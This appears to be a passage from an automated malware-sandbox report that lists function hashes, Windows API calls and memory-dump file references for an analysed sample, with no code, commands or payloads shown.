                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                              • String ID:
                                              • API String ID: 254469556-0
                                              • Opcode ID: 6e6115604d48eba7eae9617c9a3654958dbd1e97451c737f6dfa2b099b197641
                                              • Instruction ID: e1aaf8b042dba0492a6534f2dfc610e5fca3b5b69f8affe4b6bb471b9d9b1b16
                                              • Opcode Fuzzy Hash: 6e6115604d48eba7eae9617c9a3654958dbd1e97451c737f6dfa2b099b197641
                                              • Instruction Fuzzy Hash: 3031D6B5D0531CDBDB21DFA4D9897CDBBB8AF08300F1041EAE50CAB250EB759A859F45
                                              APIs
                                                • Part of subcall function 01006C90: GetLastError.KERNEL32(?,00000008,0100728F,?,?,00FF3AA8,01058E0C,?,?,00FF2949,?,?,?,?,?,00FF143A), ref: 01006C94
                                                • Part of subcall function 01006C90: SetLastError.KERNEL32(00000000), ref: 01006D36
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0101059C
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 010105E6
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 010106AC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InfoLocale$ErrorLast
                                              • String ID:
                                              • API String ID: 661929714-0
                                              • Opcode ID: f76b692a7c299be0072093f945f82469ebc80c42bbeca8c1f8ad05a104ffd6de
                                              • Instruction ID: f0a697e52cbf89bbaf76aec1c2b35198e847d6b9254334ebf264eb0dfecfc488
                                              • Opcode Fuzzy Hash: f76b692a7c299be0072093f945f82469ebc80c42bbeca8c1f8ad05a104ffd6de
                                              • Instruction Fuzzy Hash: 71616B719002079FEB699F28CC85BAA77A9FF48344F1045AAF9C5C618DEB38D981CB50
                                              APIs
                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00FFE51B
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00FFE525
                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00FFE532
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                              • String ID:
                                              • API String ID: 3906539128-0
                                              • Opcode ID: ec9701b24ce0e6af71f0df8e969c893f2b2015247d5278916d5e0b26a14f31c4
                                              • Instruction ID: 7ad0f83bd3eb895676d0782b53cb928ab25adc6635d1eedbbe4684f4f13a361a
                                              • Opcode Fuzzy Hash: ec9701b24ce0e6af71f0df8e969c893f2b2015247d5278916d5e0b26a14f31c4
                                              • Instruction Fuzzy Hash: 8631C47490131C9BCB21DF28DC8979DBBB8BF08310F5441EAE51CA7260EB749B859F55
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a197006b6fd7bb220d93cfbcff459c0e91ca35aa8dfddad1704987d1759fe6e5
                                              • Instruction ID: d128f7185a1f65b43d2a9ac7a0b0d34ed69f6026a47eeb390b7e4725b683cf08
                                              • Opcode Fuzzy Hash: a197006b6fd7bb220d93cfbcff459c0e91ca35aa8dfddad1704987d1759fe6e5
                                              • Instruction Fuzzy Hash: 5DF13171E002199FEF16CF69C8806ADFBF1FF88314F1582A9D959AB391D7309A45CB90
                                              APIs
                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0100C815,?,?,00000008,?,?,010158E5,00000000), ref: 0100CA47
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionRaise
                                              • String ID:
                                              • API String ID: 3997070919-0
                                              • Opcode ID: f4c3a62774cac40da6089b6892651282ff75919c1f7703a6dce6f95d32c1a282
                                              • Instruction ID: 42ad56c4df8d8a88354f69e752862015d4994008db1d100c6ae69b5252a68cb2
                                              • Opcode Fuzzy Hash: f4c3a62774cac40da6089b6892651282ff75919c1f7703a6dce6f95d32c1a282
                                              • Instruction Fuzzy Hash: 9EB106316106099FF756CF2CC58AA657BE0FB45364F298698E9D9CF2E1C335E981CB40
                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00FFA22B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FeaturePresentProcessor
                                              • String ID:
                                              • API String ID: 2325560087-0
                                              • Opcode ID: 506a1d181983b39aad0b64e942220dda582fbf18ea98f13d590eff590ecfb6ea
                                              • Instruction ID: efbb8474e459ba8c3b14ce6d4972ac1e15d45aed49a17b952543cdf932fcc71d
                                              • Opcode Fuzzy Hash: 506a1d181983b39aad0b64e942220dda582fbf18ea98f13d590eff590ecfb6ea
                                              • Instruction Fuzzy Hash: 415198B1E10308CBEB24CF98D4D17AABBF4FB44354F20806AD548EB295D37AA944DF50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c5022b20cea589381e22188a9389d0a03d27a9b2d0c333b0b2f6796a2916c871
                                              • Instruction ID: 84d0bb9572c3de73ce6f96858a0cced2f8caa7573b8b80cf3fcc70382da69ea2
                                              • Opcode Fuzzy Hash: c5022b20cea589381e22188a9389d0a03d27a9b2d0c333b0b2f6796a2916c871
                                              • Instruction Fuzzy Hash: 8F41A87580421DAEDB61DFADCC88AEABBB9EF45304F1441D9E44DD3241DB359E458F20
                                              APIs
                                                • Part of subcall function 01006C90: GetLastError.KERNEL32(?,00000008,0100728F,?,?,00FF3AA8,01058E0C,?,?,00FF2949,?,?,?,?,?,00FF143A), ref: 01006C94
                                                • Part of subcall function 01006C90: SetLastError.KERNEL32(00000000), ref: 01006D36
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 010107EF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$InfoLocale
                                              • String ID:
                                              • API String ID: 3736152602-0
                                              • Opcode ID: 71b29f413a5e7c3dc3934a9da67beebef4a2dbb5312b539a10209c93b32e5fd3
                                              • Instruction ID: 06d4a8a4a2f15ae056fd69c773b40838480961cb0c3d4ea712fbbffd9d205b12
                                              • Opcode Fuzzy Hash: 71b29f413a5e7c3dc3934a9da67beebef4a2dbb5312b539a10209c93b32e5fd3
                                              • Instruction Fuzzy Hash: 982198316052069BEB299E19DC45ABA77E8EF44314F10407DFDC5D6149EB39E981CB90
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 0
                                              • API String ID: 0-4108050209
                                              • Opcode ID: 2278bd0b50c19c6cc5eb16c3a136f11e2de46caf9b42d28d27dcb3d6260a3864
                                              • Instruction ID: 648965375e5fecfa19cff51c44d9cacaea5cb7434a68a7efd4534878a08d1648
                                              • Opcode Fuzzy Hash: 2278bd0b50c19c6cc5eb16c3a136f11e2de46caf9b42d28d27dcb3d6260a3864
                                              • Instruction Fuzzy Hash: BFB114B090060A8BFB668F6CC890BBFBBE1AF45380F14065AF5D6972D9CB35D541CB46
                                              APIs
                                                • Part of subcall function 01006C90: GetLastError.KERNEL32(?,00000008,0100728F,?,?,00FF3AA8,01058E0C,?,?,00FF2949,?,?,?,?,?,00FF143A), ref: 01006C94
                                                • Part of subcall function 01006C90: SetLastError.KERNEL32(00000000), ref: 01006D36
                                              • EnumSystemLocalesW.KERNEL32(01010548,00000001,00000000,?,-00000050,?,01010B79,00000000,?,?,?,00000055,?), ref: 01010494
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$EnumLocalesSystem
                                              • String ID:
                                              • API String ID: 2417226690-0
                                              • Opcode ID: f65607a61347ef0bbb93752df11cda6b0772cba4f1e7a8dc6226f3f3384b4b40
                                              • Instruction ID: 4fc3ab3ff17f15c133dad34ac04f4761019540a8428bd4841d92483bf3062f20
                                              • Opcode Fuzzy Hash: f65607a61347ef0bbb93752df11cda6b0772cba4f1e7a8dc6226f3f3384b4b40
                                              • Instruction Fuzzy Hash: 601129762003055FEB189F39C8915BAB792FF80328B54442CE9C687644D77AB582CB40
                                              APIs
                                                • Part of subcall function 01006C90: GetLastError.KERNEL32(?,00000008,0100728F,?,?,00FF3AA8,01058E0C,?,?,00FF2949,?,?,?,?,?,00FF143A), ref: 01006C94
                                                • Part of subcall function 01006C90: SetLastError.KERNEL32(00000000), ref: 01006D36
                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,01010764,00000000,00000000,?), ref: 010109F6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$InfoLocale
                                              • String ID:
                                              • API String ID: 3736152602-0
                                              • Opcode ID: df054cb99aa8795f370973ca57b9645dfeedd62415418af789cb0e1d3435e4b1
                                              • Instruction ID: 3657d6c417c2e00ee8891fffecdd832ef61906208c418666642a8a44ea45b7ce
                                              • Opcode Fuzzy Hash: df054cb99aa8795f370973ca57b9645dfeedd62415418af789cb0e1d3435e4b1
                                              • Instruction Fuzzy Hash: F7F0F937A001166BEB285A288C05BFB7B94EB40754F450568FDC1A318CEA78F981CAD0
                                              APIs
                                                • Part of subcall function 01006C90: GetLastError.KERNEL32(?,00000008,0100728F,?,?,00FF3AA8,01058E0C,?,?,00FF2949,?,?,?,?,?,00FF143A), ref: 01006C94
                                                • Part of subcall function 01006C90: SetLastError.KERNEL32(00000000), ref: 01006D36
                                              • EnumSystemLocalesW.KERNEL32(0101079B,00000001,00000000,?,-00000050,?,01010B3D,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 01010507
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$EnumLocalesSystem
                                              • String ID:
                                              • API String ID: 2417226690-0
                                              • Opcode ID: 241e1827fdb905b4c143dde961605c14f7accceae07e743721f1e49b092ea9b0
                                              • Instruction ID: 7bb72b6d60336c9095ed77aeb9922d6dd0d489fad80e0d5d555e19b2e27fd3ea
                                              • Opcode Fuzzy Hash: 241e1827fdb905b4c143dde961605c14f7accceae07e743721f1e49b092ea9b0
                                              • Instruction Fuzzy Hash: 99F0F6763003095FDB255F7D9885A7B7BD1FF80368F05846CFAC54B688D67AA882CB50
                                              APIs
                                                • Part of subcall function 01000ECC: EnterCriticalSection.KERNEL32(?,?,01006FCF,?,01021B68,0000000C), ref: 01000EDB
                                              • EnumSystemLocalesW.KERNEL32(01007508,00000001,01021B88,0000000C,01007937,00000000), ref: 0100754D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                              • String ID:
                                              • API String ID: 1272433827-0
                                              • Opcode ID: 63c3266176ac1ced9c5c5639277c45ca57b16f72255553d07c088c67b94eb500
                                              • Instruction ID: 37731fcf2f8fca79c4ac56721327fae0f717687691e5d3fe70da632be76996e8
                                              • Opcode Fuzzy Hash: 63c3266176ac1ced9c5c5639277c45ca57b16f72255553d07c088c67b94eb500
                                              • Instruction Fuzzy Hash: 79F04972A00305DFE711EFA8E441B9E7BF0EB48725F10402AE590EB290DBBA59409F81
                                              APIs
                                                • Part of subcall function 01006C90: GetLastError.KERNEL32(?,00000008,0100728F,?,?,00FF3AA8,01058E0C,?,?,00FF2949,?,?,?,?,?,00FF143A), ref: 01006C94
                                                • Part of subcall function 01006C90: SetLastError.KERNEL32(00000000), ref: 01006D36
                                              • EnumSystemLocalesW.KERNEL32(01010330,00000001,00000000,?,?,01010B9B,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0101040E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$EnumLocalesSystem
                                              • String ID:
                                              • API String ID: 2417226690-0
                                              • Opcode ID: 8b15a387b85a753cad001fda644af2f661b70085022ddc3b50d41cc7af926033
                                              • Instruction ID: db6f250c87f5ebce469b016233817d6de59cdcbe37b2f65de9e73fc1bcc3bb54
                                              • Opcode Fuzzy Hash: 8b15a387b85a753cad001fda644af2f661b70085022ddc3b50d41cc7af926033
                                              • Instruction Fuzzy Hash: 3FF05C3570020557CB159F39C84566B7F94EFC1720F06405CFA858F148C63994C2C790
                                              APIs
                                              • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,01005E4F,?,20001004,00000000,00000002,?,?,01005451), ref: 01007A6F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InfoLocale
                                              • String ID:
                                              • API String ID: 2299586839-0
                                              • Opcode ID: 268a3ec643abea0c6cfa26908b2732f3de235d12ae89636e99fcb711e0c18fda
                                              • Instruction ID: 0bef02cd07060ffbf7bb3e265053f382734e37f921a6d65cb85f14a8d41fc491
                                              • Opcode Fuzzy Hash: 268a3ec643abea0c6cfa26908b2732f3de235d12ae89636e99fcb711e0c18fda
                                              • Instruction Fuzzy Hash: 25E0DF31400218BBEF232F74DC08EEE3F16EF48720F004010FDC122290CB3A9A619B90
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0000A692,00FF9B1B), ref: 00FFA68B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: 9ce3fd1a37e3592abecfdb23111c9f0e4314e03b550948f74a36bcac9cd9c676
                                              • Instruction ID: eebdb84db02a0f110c9b9bba28caf8e8dab00260a466b8c87b2abe5095c783ea
                                              • Opcode Fuzzy Hash: 9ce3fd1a37e3592abecfdb23111c9f0e4314e03b550948f74a36bcac9cd9c676
                                              • Instruction Fuzzy Hash:
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: HeapProcess
                                              • String ID:
                                              • API String ID: 54951025-0
                                              • Opcode ID: 1ddb9cee070682249e151bb6cd742400f60ba64194ff43b9a636b5c21b2903c6
                                              • Instruction ID: ef6d3b1b60b1504254ce372fd86535b7cacf98b76afa9459f5e2e9871d64c5f3
                                              • Opcode Fuzzy Hash: 1ddb9cee070682249e151bb6cd742400f60ba64194ff43b9a636b5c21b2903c6
                                              • Instruction Fuzzy Hash: 2DA00470545301CF57504F75554570F37D557C57D570540557445D5154D77DC450FF01
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                              • String ID:
                                              • API String ID: 3471368781-0
                                              • Opcode ID: 0f9c24c657bd0db36c4f52cf0b5d76922164c765e9f4968f4a7a3e24b7d707fe
                                              • Instruction ID: 8d66e6a441b39d6039ff6dd2f27a221b7b9221d6db4290d9bc6dfece7e1e4f55
                                              • Opcode Fuzzy Hash: 0f9c24c657bd0db36c4f52cf0b5d76922164c765e9f4968f4a7a3e24b7d707fe
                                              • Instruction Fuzzy Hash: 22B126355007479BEB3AAB68CC81BB7B3E9EF44708F14456DEAC2C61C1EA74B982D710
                                              APIs
                                              • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00FF99CF
                                              • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00FF99DD
                                              • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00FF99EE
                                              • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00FF99FF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
